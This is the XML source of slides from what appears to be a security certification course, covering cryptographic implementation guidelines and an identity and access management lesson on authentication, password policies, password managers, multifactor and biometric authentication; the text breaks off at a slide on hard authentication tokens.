          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Guidelines for Implementing Cryptographic Solutions</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Follow these guidelines when you implement cryptographic solutions:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create policies to require the use of strong ciphers and key lengths, such as the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asymmetric key pair for signing: RSA 2,048-bit or ECC 256-bit</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asymmetric key pair for key exchange: RSA 2,048-bit or ECDHE 256-bit</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Secret key: AES-128 or AES-256</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Hashing: SHA256 or SHA512 (with MD5 allowed for documented compatibility requirements)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine whether to use a private CA or third-party certificates and take steps to ensure the security of any private root CA used.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Determine certificate policies and types that meet the needs of users and business workflows, such as server/machine, email/user, and code-signing certificate types. Ensure that the attribute fields are correctly configured when issuing certificates, taking special care to ensure that the SAN field lists domains, subdomains, or wildcard domains by which a server is accessed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create policies and procedures for users and servers to submit CSRs, plus the identification, authentication, and authorization processes to ensure certificates are only issued to valid subjects.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set up procedures for managing keys and certificates, including revocation and backup/escrow of keys, ideally using dedicated hardware </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cryptoprocessors</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, such as TPMs and HSMs.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36820839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B0203-FE65-A4CE-C5EE-5980DCBF124C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson 4</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Implement Identity and Access Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A53A15E-80CC-2B43-8141-AF1A75DB1098}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249487"/>
            <a:ext cx="10310359" cy="4209370"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each network user and host device must be identified with an account so that you can control their access to your organization’s applications, data, and services. The processes that support this requirement are referred to as identity and access management (IAM). Within IAM, authentication technologies ensure that only valid subjects (users or devices) can operate an account. Authentication requires the account holder to submit credentials that should only be known or held by them in order to access the account. There are many authentication technologies, and it is imperative that you be able to implement and maintain these security controls.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this lesson, you will do the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement password-based and multifactor authentication.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement account policies and authorization solutions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement single sign-on and federated identity solutions.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34874754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E0BE1-6ECB-BF36-8FF1-FBDF9C5E81AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 4A - Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79642036-1394-9CEA-F058-FD53CE99E216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249486"/>
            <a:ext cx="9905999" cy="4238399"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Authentication is performed when a supplicant or claimant presents credentials to an authentication server. The server compares what was presented to the copy of the credentials it has stored. If they match, the account is authenticated. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Authentication design </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>refers to selecting a technology that meets requirements for confidentiality, integrity, and availability:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confidentiality</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in terms of authentication, is critical, because if account credentials are leaked, threat actors can impersonate the account holder and act on the system with whatever rights they have.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integrity means that the authentication mechanism is reliable and not easy for threat actors to bypass or trick with counterfeit credentials.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Availability means that the time taken to authenticate does not impede workflows and is easy enough for users to operate.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35198848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47926-8F51-D34A-292A-C4121B733051}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Password Concepts</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Image 242">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE366F8C-8389-3A9E-1477-078941BF8AA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219465" y="2249488"/>
            <a:ext cx="4722282" cy="3541712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D11AA6E-C64A-5E94-5D58-479344200919}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To supplement best practice awareness, system-enforced account policies can help to enforce credential management principles by stipulating requirements for user-selected passwords:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Length</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Complexity</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Age</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Password Reuse and History</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8804407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0D7E8-50C8-740E-6962-BAF47A4361A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Password Managers</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB323AA5-3E59-E0EE-892F-752FBEE4CDCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="537030" y="1770743"/>
            <a:ext cx="5482770" cy="4731657"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This risk is mitigated by a password manager:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user selects a password manager app or service. Most operating systems and browsers implement password managers. Examples include Windows Credential Manager and Apple’s iCloud Keychain. If using a third-party password manager, the user installs a plug-in for their chosen browser.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The user secures the password vault with a master password. The vault is likely to be stored in the cloud so that accounts can be accessed across multiple devices, but some password managers offer local storage only.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the user creates or updates an account, the password manager generates a random password. The parameters can be adjusted to meet whatever length and complexity policy is required by the site.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When the user subsequently browses a site, the password manager validates the site’s identity using its digital certificate and presents an option for the user to fill in the password.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 246">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{571124C2-FDA9-3589-885F-9FA33FF76687}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6761045" y="1770743"/>
            <a:ext cx="4893925" cy="4731657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1553053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3C4E2-9AE4-44E6-9585-E97A1EF357A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Multifactor Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BC6482F-90FD-9AF5-C6A1-D891798548C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249486"/>
            <a:ext cx="9905999" cy="4339999"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>An authentication design that uses only passwords or a single knowledge factor is considered weak. Password secrets are too prone to compromise to be reliable. Other types of authentication factor can be used to supplement or replace password-based logins. A multifactor authentication (MFA) technology combines the use of more than one type of factor.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Something You Have Factor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Something You Are Factor</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Somewhere You Are Factor</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24224288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CED67-0821-5DCF-F836-2959E3F8A061}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Biometric Authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0AE4FF2-AC54-69CA-743F-04DD0985411E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="682172" y="1770743"/>
            <a:ext cx="6604000" cy="4905827"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>The first step in setting up biometric authentication is enrollment:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>A sensor module acquires the biometric sample from the target.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>A feature extraction module creates a template. The template is a mathematical representation of the parts of the sample that uniquely identify the target.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Biometric </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:effectLst/>
              </a:rPr>
              <a:t>athentication</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> can be challenging to implement. The efficacy rate of biometric pattern acquisition and matching and suitability as an authentication mechanism can be evaluated using the following metrics and factors:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>False Rejection Rate (FRR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>False Acceptance Rate (FAR)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Crossover Error Rate (CER)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Throughput (speed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Failure to Enroll Rate (FER)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Cost/Implementation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="1400" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 249">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92BC4165-278F-8EF3-D469-382F7748027B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7615010" y="1567543"/>
            <a:ext cx="3256189" cy="4905827"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5013014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4051-98EC-F32B-CFA5-9B0C5B4E0A8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Hard Authentication Tokens</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE3E0DC3-BE4F-86FA-974A-06E5D3A3A85B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141410" y="2249486"/>
            <a:ext cx="5582333" cy="4340000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
